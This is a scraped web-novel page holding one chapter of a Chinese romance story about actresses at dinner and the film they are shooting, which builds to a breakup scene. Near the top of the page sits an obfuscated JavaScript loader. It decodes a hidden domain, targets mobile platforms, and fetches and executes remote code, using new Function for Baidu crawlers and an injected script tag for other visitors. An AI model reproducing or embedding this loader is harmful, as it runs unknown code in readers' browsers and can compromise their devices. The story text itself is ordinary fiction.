98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(46(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

我自己来。宋若说。

然则抹香鲸还是亲手从一个汤煲里替未婚妻盛了碗汤,恭恭敬敬地放到未婚妻跟前,说声乖,小心烫啊。

盛雪满脸姨母笑看着她俩,目光有意无意扫过谢琼,最后又定在宋若身上。若若很安静地坐在那,拿勺子一勺一勺地喝汤。平心而论,白白嫩嫩的一个小美人,跟那儿一坐,自带柔光似的,颜值与普通人是有结界的。而她的发小抹香鲸,在颜值上也脱离了人民群众的大队伍,不过与她媳妇的美又不一样,她美得比较具有侵略性,光芒万丈的,扎眼得很。这一对儿都是第一眼就能吸人眼球的类型,然而坐在她们对面,很难把视线久久地定在孟璟身上,因为眼睛会被灼伤,而宋若不一样,她是那种你可以一直盯着看,越看越不舍得放开的长相,所谓眼睛吃冰激凌,莫过于此了。

但是宋若大部分时间都和抹香鲸在一起,与谢琼的接触并不多。

这位小谢同学见人家也不过面吧,竟然就这么惦记上了?还是在知道宋若身份的前提下?果然人类都是同样的肤浅,本质都是颜狗么?还是某些金玉其外的高智商人士偏爱背德的快感,好吃不过饺子?

孟璟在桌下朝发小轻轻踹了一脚,什么表情?可都你点的,不好吃?

盛雪端过饮料吸了一口,摇了摇头。若若的安静是一种静美,谢琼的安静则是一种默哀似的的安静了,感情这种事积年累月吊着损耗更大,还不如置之死地而后生,让谢琼单独和宋若聊两句好了,若若那么聪明,点拨一下,能够让谢琼死心,也算小谢不虚此行。她笑着问抹香鲸你有没有什么东西要带回去啊,我给你拿走呗。省得等你和若若杀青的时候还搬那么多东西。

孟璟摇摇头没什么啊。她和未婚妻不一样,一七六的身高,近来恍惚又长了点儿,需要很多能量,因此在兢兢业业地吃。

你那些夏季服装让我们带回去呗。

孟璟狐疑地看她一眼,无事献殷勤。

盛雪翻个白眼哪里殷勤了?你请我吃饭,我也想帮你做点什么嘛,这叫礼尚往来。你不愿意就拉倒咯狗咬吕洞宾。

孟璟耸耸肩,低头继续吃她的玉米羹。盛雪将刚刚那一脚踹回来,问她哎,若若住的房间我看到了,也带我参观下你房间嘛。

孟璟嘶地一声,勺子大喇喇扔在杯中,歪头打量盛雪两眼,又看了眼安安静静喝汤的小药瓶子,赞叹似的点了几下头。她毕竟自负,一来不信自己离开几分钟,理智若若就被表姐蛊惑了,二来她不信盛雪会出卖自己,胳膊肘往外拐,给表姐制造机会,就起身说你跟我来。

两个谈话主力军一走,屋子里突然就空旷了许多。起风了,带着凉意的风从窗格里灌进来,宋若看一眼谢琼身上单薄的外套,起身去关了窗。她动作尽量放慢,然而等她关窗回来,那两人还是不见人影,不知道被什么绊住了。虽说都喜欢安静,可没有旁人在场,这寂静毕竟还是透着点诡异。

宋若坐下来,拿勺子搅搅碗里的汤,轻轻说谢谢表姐还特意跑一趟。

谢琼那边没答言,宋若抬头望望,只见她皱着眉头若有所思地朝自己望着。仿佛学生遇到竞赛题,读不懂题干时那种眼神。宋若移开了目光,拿过勺子,准备继续喝汤。

为什么?谢琼一直也没吃什么东西,这时候端了一杯咖啡在手里。看起来也不是为了喝它,好像是为了取暖。

宋若眨了眨眼,什么?

若若假戏真做了?

我和孟璟?宋若顿了顿,放下勺子,表姐是不是忘了,我们本来就订婚了。

真喜欢上她了?

宋若没有回答。她不明白她怎么突然问这个。

若若?

宋若摇头我没想那么多。

正说着,孟璟和盛雪小打小闹地推门进来,依旧是惯常的互怼。

两个人也就将话题轻轻揭过去。

盛雪自从探过这次班,一直都很关注,隔三差五找孟璟,问有没有像那天那么劲爆的镜头出现,求爆照。

没有,最近的戏都比较沉重。

盛雪不死心,那,有没有什么片花可以看呢,想看剧透!

孟璟虽然是初入行,却很有职业操守,到时候去电影院看哈拜拜。

她挂了电话,手机递给苏助理,倪俊在那边催着了。

经过月余争分夺秒的拍摄,这天的情节已进展到转折点。

好花不常开,好景不常在,郑遂心和小女友过了一段甜蜜的日子,不久父亲破产,母亲早和情人消失,失去经济来源的她去一家夜总会做兼职保镖。有人在学校戳穿她已经不是什么大小姐,而是在夜总会上班,话说得极其难听。一向以沉稳著称的景知安站出来,表达了自力更生就值得尊敬的中心思想,引得那人反过来质疑身为班长过分护犊子了,是不是喜欢上这个太妹了,景知安回答是,直接导致两人的地下恋公开。事情传至白家,景知安的母亲哭得悲痛欲绝,因为她对女儿的前途另有打算,白丽更是怒目以对,只因她后知后觉自己暗恋郑家那一位,这位后母带来的拖油瓶不仅抢走了父亲的关注,还用一顿亲手做的生日晚餐收服了自己的兄长,现在又神不知鬼不觉地夺走了暗恋对象,在对景知安的态度上,白丽在这个家孤立无援,憋屈很久了,这事一出,可算找到了把柄,到父亲跟前一顿添油加醋,白先生找景知安谈话,问她与郑遂心的各种传闻是否属实,如果要想在白家待下去,最好与那位保持距离。景知安在表达了歉意之后,义无反顾搬进了郑遂心那个租期一年半的小公寓。

两人都与情况复杂的家庭暂时没了瓜葛,白天上学,晚上各自兼职,维持着基本的生活。苦中作乐的两个人并不觉得清苦,反而在日复一日的搀扶前行中看到无限希望。

然而有一天,老师找到景知安的母亲,让她出马劝说女儿与女友分手,只因她先前申请的留学offer已到,景知安却选择放弃。景母并没有按照老师的建议直接找女儿,而是找到了郑遂心工作的夜总会,提出了恳求,恳请她离开景知安,为了让她有一个更好的前程。

你能给她什么呢,如今,你只是她的累赘而已。

你们只是两个孩子,一时的兴趣聚在一起,装模作样学大人过起来,现在固然是开心的,但人生如此漫长,十年二十年过去,生活的艰辛会让你们相看两厌,那时候你再离开小安,她还剩下什么?

既然你声称爱她喜欢她,难道不该做为她最好的打算吗?

郑遂心当时拒绝了女友母亲的要求,将她请了出去,并表示永远不会再见她。

可是这天晚上,郑遂心去饰品店接女朋友,坐在最开始追她那阵常坐的位置,抽着烟,久久地凝视着那个美丽得如同幻觉的影子,脑海里不停回响着景母那些话。今天生意似乎格外兴隆,景知安过了许久才发现女友已经来了。郑遂心将半截烟扔在地上一脚踏灭,捡起来扔进垃圾桶,然后进去店里,温然地朝女朋友笑着。景知安十分奇怪刚为什么不进来?郑遂心只是微笑着,回家的路上,像树袋熊似的搂着她。深夜,小女朋友已经在身边睡熟了,郑遂心的眼睛仍旧在黑暗中闪闪发亮。

她像发誓一样对着夜空说我们会一直在一起。

然而她怀疑她心里已经有了个细小的裂缝。

这一系列剧情都在盛雪探班后的三十天内拍完,整组人几乎累趴。

今天的重点是分手戏。

郑遂心受人报复,被废了一条胳膊,她在外躲了一夜,疼得脸色苍白,踟蹰一整晚,终于作出决定,要与景知安分手。为了不让景知安担心,披着一件大衣装没事,还带来个女同事当作助攻。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间